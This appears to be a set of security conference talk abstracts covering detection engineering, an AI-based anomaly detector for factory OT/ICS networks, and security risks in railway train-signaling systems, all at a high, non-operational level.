In response to the increasingly complex and changing network threats, enterprise networks often exhibit high heterogeneity with diverse architectures, operating systems, and applications. This diversity challenges the application of a single detection logic. Detection Engineering has emerged as a crucial theme, enabling the design of flexible detection rules tailored to specific environments through systematic methods. By abstracting attack behaviors into characteristic patterns, this approach remains adaptable to rapid changes. This presentation explores the core concepts and practices of Detection Engineering, demonstrated with real-world cases. We'll also discuss using frameworks like MITRE ATT&CK to deconstruct and locate potential detection points in attack behaviors.

For those ambitious threat actors targeting on OT/ICS field, their actions invariably are highly intensity planed to produce successful hacking. By abusing multiple misconfigurations and benign OT-specific nature infrastructure to evade multiple layers of protection, they can stealthily control the factory’s essential assets from IT to OT fields. For example, according to Mandiant’s report, the Russian hacker group, Sandworm, abused OT-level LoTL (Living Off the Land) to disrupt power in Ukraine. The key to success is abusing those OT-specific protocols, techniques, and LOLBins which are difficult to detect as malicious by modern AV/EDR. 

In this research, instead of detecting MALICIOUS, we propose a novel multimodal AI detection, Suspicious2Vec, which archives contextual comprehension on process integrity and suspicious behaviors of OT/ICS benign operation. We use the AI model on large-scale real-world factories, to create a baseline of universal nature OT-specific operating into numerical vectors and success filter in-the-wild anonymous abuse for attacks into malicious.

From July 2023 to July 2024, our experiment whole year to received 2,000,000 data which were detected as unique suspicious techniques by 562+ human-written expert rules. We use the AI model to project those suspicious actions into numerical vectors by well-known word embedding methods, and also model all the suspicious behaviors from the OT + IT malware family from VirusTotal to generate a set of malware templates as neural ASR (Attack Surface Reduction) rules for detection, and success capture 12+ variant OT malware from 52,438 factory program files.

"Attacks on rail systems have increased by 220%." Last August, a retired official from the U.S. National Security Agency (NSA) pointed out that threats to railways have become the spark that ignites warfare in regional conflicts. In recent years, incidents such as train hijackings, railway paralysis, and the cutting off of supply lines have emerged as new national security concerns worldwide. In response, the U.S. National Institute of Standards and Technology (NIST) and the Transportation Security Administration (TSA) jointly issued more stringent rail safety standards in October 2022 to counter these threats and protect critical transportation systems like subways, railways, and train networks.

However, due to the early development of railway and train control systems, many insecure train signaling systems have been widely adopted around the world and have become the mainstream choice for both public transportation and freight operations.

To fully explore the scope of these threats, this session will consolidate and review the six major systems used in global railways and public transportation (e.g., CBTC, ATP, ATC, and PZB) and examine their underlying track signaling control systems. We will begin with a research on ATS (Automatic Train Stop) presented at CODE BLUE 2024—a classic system that has been extensively deployed in Japan and Europe. Its signaling design is intended to automatically stop a train in the event of an emergency, without requiring human intervention. However, once attackers gain sufficient understanding, they can exploit this mechanism to control train operations; even the modern ATC (Automatic Train Control) systems used in North American railways carry similar risks.

The session will cover topics including braking devices, automated signal-based braking, and the communication design and security risks associated with HOTT (Head of Train Telemetry) and EOTT (End of Train Telemetry), along with real-world replay signal attacks. It will conclude with recommendations for preventive measures, aimed at guiding the future development and planning of rail cybersecurity systems to safeguard critical rail infrastructure.